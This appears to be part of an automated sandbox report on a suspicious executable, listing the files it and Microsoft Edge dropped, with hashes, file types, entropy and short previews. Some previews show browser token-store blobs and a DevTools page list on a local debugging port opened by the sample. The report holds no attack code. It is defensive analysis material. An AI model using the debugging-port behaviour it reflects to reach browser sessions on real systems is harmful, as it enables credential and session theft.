                                                                                                                                                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):460992
                                                                                                                                                                                                                                                                              Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                              MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:uriCache_
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                                                                              Entropy (8bit):5.020523446526973
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclRyJQY4Yn:YWLSGTt1o9LuLgfGBPAzkVj/T8lBVY
                                                                                                                                                                                                                                                                              MD5:B44AAF236C5454C995DC024AEDFA3DC1
                                                                                                                                                                                                                                                                              SHA1:48C3ED317E64CF3F98101A1C256BF042BF11054A
                                                                                                                                                                                                                                                                              SHA-256:36C02B60B349264EE2F3265605D466647F6F8077A30D17ECC155AE2784606B7E
                                                                                                                                                                                                                                                                              SHA-512:DE2C0251205898DCFD0B35B667E5007A6F42CAB828ED16E1D9EEE3182363E3744A3C7350E032475BDE2F382509888BAB183F49EB580B2AAFE631C3FB4962E162
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734781337519587}]}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                              MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                              SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                              SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                              SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):57639
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103549110629139
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynSPGWv/sxtwfj7VLyMV/YoskFoz:z/0+zI7ynGv/4KnVeZoskG
                                                                                                                                                                                                                                                                              MD5:F263B751997282FC006CE4B5999E237F
                                                                                                                                                                                                                                                                              SHA1:EC62C3CFEA42F51E2BF75590208DB932B0E81343
                                                                                                                                                                                                                                                                              SHA-256:30AABDB5ED5C0C5C6E370DB38083F5EF40A6984F72793B3E32477B9A391BC2D0
                                                                                                                                                                                                                                                                              SHA-512:27686BBFE1EB90D8C02926C9317896263DDF2A057822CF360247D2A9E6BF057E67D63ACBC4BA245D30DEF66092BF5A23231CE0E3790F6CFCDE8C9652A0B05F07
                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):59005
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100662399565544
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8HnaSPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8HZv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:66DBBFC02EAB5D3EB2C3FD3BEF43352B
                                                                                                                                                                                                                                                                              SHA1:8429A57A12CEDBB6C6975DB7BA099DCD39BFF625
                                                                                                                                                                                                                                                                              SHA-256:9AAC540D9A33CD24157FCF3177871D1E8442D0950E4CB5D52B73316529AE52B6
                                                                                                                                                                                                                                                                              SHA-512:A7D78F4D90355B7434C65D3E68FD932447FC733AB276F5ABC610A172763381E9B687F82DE19D4B284EAB304854FCF8D55562EC33BF386E4D93B01E7C54BD102D
                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                                                                                              Entropy (8bit):3.834963556423681
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxrgxcUxl9Il8ubbbexJ8LKuK3k2Thj2I6C4VBKtfYgmxd1rc:mFoYdGJmKtk2TFj6tVBKtA/S
                                                                                                                                                                                                                                                                              MD5:0DCD77E095677225A64A00531A3D192C
                                                                                                                                                                                                                                                                              SHA1:37BF6A66EB425D013796E6F28540FD7311CCB95E
                                                                                                                                                                                                                                                                              SHA-256:D50293C8BD25C636C85D41D259BFA5A441A71365D3BBCAD24D4823E3F5B03FD6
                                                                                                                                                                                                                                                                              SHA-512:B875E6EF8C17B10846366F7A44B907F2BF87239267B736EB0CCDCCFBC47CA3846EF51B2B314F07B978012CE4EB401850325CE937D210FAA2D7EFBA9A989A2899
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.R.7.E.r.t.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.U.v.l.V.k.A.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                                                                                              Entropy (8bit):3.9979713677285034
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:kYdbCO1XQ6oI5SRWGMVLaHOgMSI+AEK0bpLaxJf+QsG0F5GOm:kmbdlQ6oUAWHhaH1IZErpuN0TGOm
                                                                                                                                                                                                                                                                              MD5:1FFADF90D9C9E7BA3DF1C3CC12092155
                                                                                                                                                                                                                                                                              SHA1:9BA8D6D380E1943DB1D6A5F90D97E19F6E234471
                                                                                                                                                                                                                                                                              SHA-256:8E53B58B745787BAB7065B6351F46D0FDAE2F08FF81610E53A481C0FFDAA33F0
                                                                                                                                                                                                                                                                              SHA-512:8810F1743EDB7F2C0C097938FF0D3F0057EA4040B5E63191EFF1F2A1036D4461A74C81E00DADD3BB347827B108240D4D0AEECC9DF1D4EEF2ED8E2C0892756EC1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".3.u.U.i.+.L.J.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.U.v.l.V.k.A.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2684
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8996830596474186
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xMyxl9Il8ubbbPoTzxRLepX7JFmAz5TMXbQI7kH3d/vc:aRYdngfbuL71zt0bN70C
                                                                                                                                                                                                                                                                              MD5:2B07402AA6CB98AFF8A2954BFB1A166F
                                                                                                                                                                                                                                                                              SHA1:52AEF82D56FA8F0435EE9B24FCB2C21E85205975
                                                                                                                                                                                                                                                                              SHA-256:B303C5BD6FBB976F488793F1FAF798E7C86DB01EFF81CE39D80568374CA6651B
                                                                                                                                                                                                                                                                              SHA-512:4DB9A658D662D675D5D6DC1BF0FC09529C72F16842D98E904BDBFA4E1033DAD5B3F59BB3DB2016CA2F6C6B0E5F4F0429141E1A33BBB2A25FC7D0DFDDD97A8C35
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".c.+.N.r.K.I.R.x.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.U.v.l.V.k.A.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3500
                                                                                                                                                                                                                                                                              Entropy (8bit):5.398078230569568
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:6NnCxATHCxkNnCMbCdNnCw9CqNnCZdgECMNnCQCdNnCgDC0NnCMwCINnCq3Cm:6N+AqkNgNrNCPNSNnBN1CNV
                                                                                                                                                                                                                                                                              MD5:AB06C90794D4E45C84F553432BFE0324
                                                                                                                                                                                                                                                                              SHA1:802C87D08C40E5E9520EAF330D6B8301563FC5C5
                                                                                                                                                                                                                                                                              SHA-256:66BB75ABAA81C19284CCDF11B0F3C5846A7BF61731CC445BFE64B8E6EF4E04AE
                                                                                                                                                                                                                                                                              SHA-512:A3BEF3E5D52CC8F079575F49A3F86F2E55E4D0BB33EFE68F8E0E7CCD6EA9EB8F244BC09B0AC20371A0A282D2250CE7696B641E6777699278199620D466DF7B1B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1D6BCEFF3D62ECB13633E925AB452356",.. "id": "1D6BCEFF3D62ECB13633E925AB452356",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1D6BCEFF3D62ECB13633E925AB452356"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F3B5D31AFA161F13ABB7582DFF6C327D",.. "id": "F3B5D31AFA161F13ABB7582DFF6C327D",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F3B5D31AFA161F13ABB7582DFF6C327D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1787
                                                                                                                                                                                                                                                                              Entropy (8bit):5.366885335382368
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:SfNaoCoOXTECohfNaoC0C6fNaoCpCofNaoC7rK0UrU0U8C7z:6NnCoOXTECo9NnC0CCNnCpC0NnC7rK0x
                                                                                                                                                                                                                                                                              MD5:A7400ABD98AAE91AA7871ACD07631B4D
                                                                                                                                                                                                                                                                              SHA1:83B8445F88F2BE65724DAA33A3BC57C2CEE846D5
                                                                                                                                                                                                                                                                              SHA-256:D5AA8776F5AEAA1EE5FFF55F5C07CC38F498F92A648B1C077C6C8759AE77480C
                                                                                                                                                                                                                                                                              SHA-512:FD75BE45C18C11B1C6B1F94997ABFF371C34E1E665A7607F75E3C5215EA4D0F855E5D106F2B9C497F7D1069822C1EACFB13CC3B83AC3BDC03DE76193571FE74A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/24266637C3BE59FACB76B15B8422B470",.. "id": "24266637C3BE59FACB76B15B8422B470",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/24266637C3BE59FACB76B15B8422B470"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6480BE37AC25E1189CEE8149225021EA",.. "id": "6480BE37AC25E1189CEE8149225021EA",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6480BE37AC25E1189CEE8149225021EA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):206855
                                                                                                                                                                                                                                                                              Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                              MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                              SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                              SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                              SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):76326
                                                                                                                                                                                                                                                                              Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                              MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                              SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                              SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                              SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):154477
                                                                                                                                                                                                                                                                              Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                              MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                              SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                              SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                              SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
